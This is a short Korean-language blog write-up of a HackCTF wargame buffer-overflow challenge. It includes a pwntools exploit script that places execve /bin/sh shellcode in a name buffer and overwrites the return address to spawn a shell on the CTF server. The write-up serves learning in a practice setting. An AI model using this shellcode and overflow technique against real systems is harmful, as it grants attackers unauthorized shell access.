본문 바로가기

내 버퍼가 흘러넘친다!!! 본문

wargame/HackCTF

내 버퍼가 흘러넘친다!!!

Seongjun_You 2021. 12. 4. 17:47

두 번의 입력을 받을 수 있다.

 

해당 위치에 bp를 걸고 값을 넣는다.

 

 

 

ret까지 디버깅을 돌려 확인을 했다.

ret값이 수정되어있으므로 bof를 이용할 수 있다.

 

Name에 shellcode를 입력한다.

ret값을 Name의 주소로 덮는다.

 

from pwn import *
p = remote("ctf.j0n9hyun.xyz",3003)
context.log_level = 'Debug'
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
p.sendlineafter(": ",shellcode)

payload = b"A"*(24) + p32(0x804a060)
p.sendlineafter(": ",payload)
p.interactive()

 

 

'wargame > HackCTF' 카테고리의 다른 글

x64 Simple_size_BOF  (0) 2021.12.07
x64 Buffer Overflow  (0) 2021.12.07
Basic_FSB  (0) 2021.12.04
Basic_BOF #2  (0) 2021.12.04
Basic_BOF #1  (0) 2021.12.04
Comments